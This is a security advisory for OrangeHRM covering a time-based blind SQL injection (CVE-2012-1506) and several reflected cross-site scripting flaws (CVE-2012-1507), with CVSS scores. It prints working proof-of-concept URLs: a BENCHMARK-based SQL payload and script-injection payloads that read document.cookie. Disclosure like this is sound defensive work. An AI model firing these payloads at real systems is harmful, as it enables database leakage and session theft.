6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.007 Low
EPSS
Percentile
77.1%
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OrangeHRM, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
SQL Injection in OrangeHRM: CVE-2012-1506
1.1 Input passed via the “hspSummaryId” GET parameter to /plugins/ajaxCalls/haltResumeHsp.php is not properly sanitised before being used in SQL “UPDATE” query. This vulnerability can be exploited by time-based blind SQL injection techniques to reveal sensitive information from the database.
The following PoC (Proof of Concept) will cause a delay of the script execution if MySQL server version is 5.*:
http://[host]/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hsp SummaryId=%27%20OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29 %29=5,%28select%20BENCHMARK%281000000,ENCODE%28%22hello%22,%22goodbye%22%29% 29%29,%272%27%29%29%20–%202
Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
Multiple Cross-Site Scripting (XSS) in OrangeHRM: CVE-2012-1507
2.1 Input passed via the “newHspStatus” GET parameter to /plugins/ajaxCalls/haltResumeHsp.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of affected website.
The following PoC (Proof of Concept) demonstrate the vulnerability:
http://[host]/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId=1&newHspStatu s=1%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&empId=1
2.2 Input passed via the “sortOrder” GET parameter to /templates/hrfunct/emppop.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of affected website.
The following PoC (Proof of Concept) demonstrate the vulnerability:
http://[host]/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscr ipt%3Ealert%28document.cookie%29;%3C/script%3E
2.3 Input passed via the “uri” GET parameter to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a administrator’s browser session in context of affected website.
The following PoC (Proof of Concept) demonstrate the vulnerability:
http://[host]/index.php?uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document. cookie%29;%3C/script%3E